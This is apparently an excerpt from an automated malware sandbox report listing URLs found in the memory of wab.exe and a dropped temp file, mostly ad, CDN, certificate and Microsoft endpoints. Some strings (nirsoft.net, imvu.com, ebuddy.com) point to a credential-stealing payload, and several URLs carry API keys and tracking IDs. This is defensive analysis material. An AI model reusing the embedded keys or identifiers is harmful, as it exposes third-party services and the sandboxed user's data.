              Source: bhv7197.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
              Source: bhv7197.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
              Source: bhv7197.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: bhv7197.tmp.9.drString found in binary or memory: http://s.ss2.us/r.crl0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
              Source: bhv7197.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: bhv7197.tmp.9.drString found in binary or memory: http://status.geotrust.com0=
              Source: bhv7197.tmp.9.drString found in binary or memory: http://status.thawte.com09
              Source: bhv7197.tmp.9.drString found in binary or memory: http://trc.taboola.com/p3p.xml
              Source: bhv7197.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv7197.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0u
              Source: bhv7197.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0v
              Source: bhv7197.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49607571174.00000000039ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000B.00000002.49606634491.0000000000F8C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/hnS
              Source: wab.exe, 0000000B.00000002.49607571174.00000000039ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000009.00000002.49637274715.00000000030E3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv7197.tmp.9.drString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double(
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ(
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activiH
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631826682.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628718013.00000000051C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626062080.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627438697.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631961904.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631062841.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49632061224.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49631698308.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630734774.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhv7197.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhv7197.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.H
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv7197.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv7197.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv7197.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhv7197.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv7197.tmp.9.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FAC
              Source: bhv7197.tmp.9.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
              Source: bhv7197.tmp.9.drString found in binary or memory: https://capturemedia-assets.com/
              Source: bhv7197.tmp.9.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.adnxs.com/v/s/215/trk.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-msa.png?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/jquery-1.12.4.1.min.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdn.taboola.com/TaboolaCookieSyncScript.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: bhv7197.tmp.9.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
              Source: bhv7197.tmp.9.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check(
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/botguard-scs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/botguard-scs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/storyset?platform=desktop&release=20h2&schema=3.0&sku=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/gs/en-US/xmlv2/tip-contentset?platform=desktop&release=20h2&schema=3.
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/5c08e5e7-4cfd-4901-acbc-79925276672c/33c540c16
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7
              Source: bhv7197.tmp.9.drString found in binary or memory: https://cxcs.microsoft.net/static/public/tips/neutral/fb5aa6fc-fb0f-43c0-9aba-9bf4642cdd05/9a3b4a8d1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lifh
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 00000009.00000003.49624961996.00000000059B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://eb2.3lift.com/sync?
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-FRAr4b&Fr
              Source: bhv7197.tmp.9.drString found in binary or memory: https://evoke-windowsservices-tas.msedge.net/ab
              Source: bhv7197.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
              Source: bhv7197.tmp.9.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv7197.tmp.9.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.coh
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coH
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 00000009.00000003.49627377448.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626710700.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626762184.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626930014.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627607503.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627438697.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626658498.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627734054.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626603872.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627476918.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627667653.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626819102.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626488283.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626876567.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49635884632.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627542397.00000000059B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/si
              Source: bhv7197.tmp.9.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ib.3lift.com/sync.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ib.adnxs.com/
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRT?ver=5f90
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4GhRY?ver=52e8
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IMai
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IQAK
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OALs
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OAdg?ver=1c49
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrw?ver=d941
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OFrz?ver=8427
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4OI51?ver=0686
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ONWz
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWB7v5
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIa
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWFNIj
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWG0VH
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLcTb?ver=b557
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWLuYO
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAMqFmF?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AANf6qa?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODMk8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODQmd?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAODept?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEFck?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=82
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOEQ0I?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4WR?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOF4Xx?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFBrV?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFC5q?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFCgW?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
